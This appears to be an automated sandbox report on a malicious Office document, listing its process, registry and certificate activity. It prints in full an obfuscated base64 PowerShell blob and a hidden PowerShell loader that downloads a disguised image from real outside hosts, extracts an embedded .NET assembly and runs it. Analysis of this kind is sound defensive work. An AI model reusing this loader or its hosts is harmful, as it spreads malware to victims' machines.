Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: eib.pdb;Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bib.pdb>Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: t.pdb,Q source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Automation.pdbpdbzY source: powershell.exe, 00000012.00000002.515184952.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp

Source: ~DF96697D1024044DC5.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: P018400.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }	Jump to behavior

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\91.92.244.96\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\91.92.244.96\DavWWWRoot			Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 12_2_035306A2 URLDownloadToFileW,ShellExecuteW,ExitProcess,

12_2_035306A2

Source: C:\Windows\SysWOW64\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
